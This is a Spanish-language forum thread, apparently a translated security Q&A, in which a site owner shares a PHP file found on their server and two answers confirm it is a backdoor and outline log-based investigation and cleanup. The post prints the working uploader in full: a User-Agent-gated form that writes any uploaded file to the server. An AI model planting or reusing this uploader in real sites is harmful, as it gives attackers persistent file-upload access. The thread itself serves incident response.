¿Posible pirateo en el sitio?

Navega tus respuestas
0

Encontré un archivo extraño en uno de mis servidores que contiene el código a continuación. El archivo se modificó por última vez hace una semana a las 1.40 AM de la noche, lo cual es un poco extraño.

Últimamente he realizado muchos cambios en este sitio, pero no recuerdo haber subido este archivo: 

<?php if(md5($_SERVER["HTTP_USER_AGENT"]) !== "49de371511c1de3bde34b0108ec7f129")
{
die("04030");
}
if (isset($_FILES["file"])){
    $z = $_FILES["file"]["name"];
    move_uploaded_file($_FILES["file"]["tmp_name"],$z);
    header("Location: $z"); exit(); }
    ?>
<html>
<body>
<form action="<?php echo basename(__FILE__); ?>" method="post" enctype="multipart/form-data">
  <label for="file">Filename:</label>
  <input type="file" name="file" id="file">
  <br>
  <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

Entiendo lo que hace el código, pero no estoy seguro de que alguien más pueda haber subido esto, luego yo con la intención de piratear mi sitio. ¿Qué piensas?

Hice una comprobación rápida del servidor de todos los archivos que se modificaron después de agregar este código, pero no encontré nada sospechoso.

    
pregunta Carl 27.10.2014 - 21:57
fuente

2 respuestas

5

Esto podría muy bien ser un archivo malicioso. Yo realizaría los siguientes pasos básicos de investigación:

  1. stat the file # stat filename

  2. use los tiempos modificados y modificados de la estadística y compárelos con el servidor web access_log para rastrear cómo llegó el archivo allí. Probablemente habrá un POST para un script diferente donde se cargó.

  3. Si no se encuentra nada en los registros de acceso, verifique sus registros de FTP, ya que podría tener un usuario de FTP comprometido.

Limpieza:

  1. Busque y parche el archivo vulnerable si se confirma a través de los registros de acceso
  2. Cambie las contraseñas compiladas y ejecute el software anti-spyware en su caja local
  3. Eliminar archivo malicioso
respondido por el morissette 27.10.2014 - 22:01
fuente
0

La respuesta simple a tu pregunta es "sí", su archivo malicioso.

Esto podría suceder si se cargan shell con errores de formularios de carga o se tiene acceso a ftp (u otros protocolos que dan acceso a archivos).

pero esto es muy extraño! la pregunta es si el pirata informático puede subir archivos a su sitio web y tiene acceso, ¿por qué sube este archivo primero?

¡Me pregunto si también intentaron otorgar acceso a la carga de archivos más tarde! Quiero decir, si solucionas el error de tu programa, aún pueden cargar y EJECUTAR sus archivos más tarde simplemente publicándolos en su antiguo script. Su tipo de acceso posterior a los archivos del servidor, supongo.

Morissette ya ha dicho cómo limpiarlo. Desearía poder ayudar a alguien a pesar de que esta es una publicación antigua

    
respondido por el Sepehr GH 24.01.2016 - 12:29
fuente

Lea otras preguntas en las etiquetas

¿El valor de cookie ASP.NET .ASPXAUTH siempre es el mismo para un usuario determinado? [cerrado] ¿Cómo se identifican las computadoras en las redes?